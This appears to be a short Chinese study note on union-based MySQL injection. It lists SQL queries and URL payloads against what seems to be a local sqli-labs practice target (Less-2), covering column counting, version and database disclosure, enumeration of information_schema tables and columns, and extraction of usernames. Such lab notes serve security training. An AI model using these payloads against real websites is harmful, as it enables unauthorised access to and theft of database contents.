Mysql注入 -- 联合注入

select * from users order by 3；

select * from users union select 1,2,5;

select * from users union select user(),version(),database();

select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou";

select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 0,1;select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 1,1;select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 2,1;

select * from users union select 1,2,column_name from information_schema.columns where table_name="bucuo";

select * from users union select 1,2,username from users；

http://192.168.139.129/sqli/Less-2/?id=1 order by 3 

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,3

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,version(),database()

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security"

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security" limit 1,1 --

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users"http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users" limit 1,1 --

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from usershttp://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from users limit 1,1 --